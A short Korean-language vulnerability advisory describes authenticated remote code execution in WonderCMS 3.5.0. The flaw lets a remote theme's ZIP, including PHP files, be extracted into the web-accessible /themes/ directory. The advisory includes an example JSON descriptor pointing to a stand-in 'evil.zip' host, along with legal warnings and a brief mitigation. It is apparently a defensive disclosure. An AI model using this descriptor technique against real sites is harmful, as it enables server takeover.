
WonderCMS 3.5.0용 악성 테마 설치를 통한 인증된 RCE 익스플로잇. 취약점 메커니즘, PoC 및 완화 지침을 포함하여 보안 테스트 및 교육을 제공합니다.
인증된 원격 코드 실행(RCE) 취약점이 WonderCMS v3.5.0에 존재합니다.
문제는 애플리케이션이 JSON 설명자를 통해 원격 테마/모듈 설치를 처리하는 방식에서 발생합니다. 관리자가 ZIP 아카이브를 참조하는 원격 JSON 파일을 제출하면, 해당 내용이 웹에서 접근 가능한 디렉토리(예: /themes/)에 추출됩니다. ZIP에 PHP 파일이 포함된 경우, 해당 파일은 웹을 통해 접근 가능해지며 실행될 수 있습니다.
이 동작은 다음과 같은 이유로 RCE 위험을 초래합니다:
참고: 관리자 인증이 필요하지만, 기본 설치에서는 관리자 비밀번호가 공개적으로 노출되며(홈페이지에), 비밀번호 전용 로그인을 사용하고, 강력한 인증 제어를 적용하지 않습니다.
WonderCMS는 제출된 JSON 설명자가 예상된 wcms-modules.json 형식과 일치하는 경우 원격 모듈/테마를 수락하고 설치를 시도합니다. 형식 확인을 통과한 설명자(ZIP 아카이브를 가리키는 경우)는 가져와져서 해당 아카이브 내용이 추가 파일 유형 검증 없이 웹 접근 가능 디렉토리(예: /themes/<name>/)에 추출됩니다.
예시 설명자 :
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
경고: 프로덕션 시스템에서 실행하지 마십시오. 승인된 테스트 환경에서만 사용하세요.
(참고: 통제된 테스트 환경에서만 이 단계를 수행하십시오. 승인 없이 라이브 시스템에서 이 취약점을 악용하는 것은 불법입니다.)
노출을 줄이기 위해:
themes/ 또는 plugins/ 내의 실행 파일 접근을 차단합니다.이 정보는 방어적 보안 연구 및 교육 목적으로 제공됩니다. 취약점을 테스트하거나 공개하기 전에 항상 적절한 승인을 받으십시오.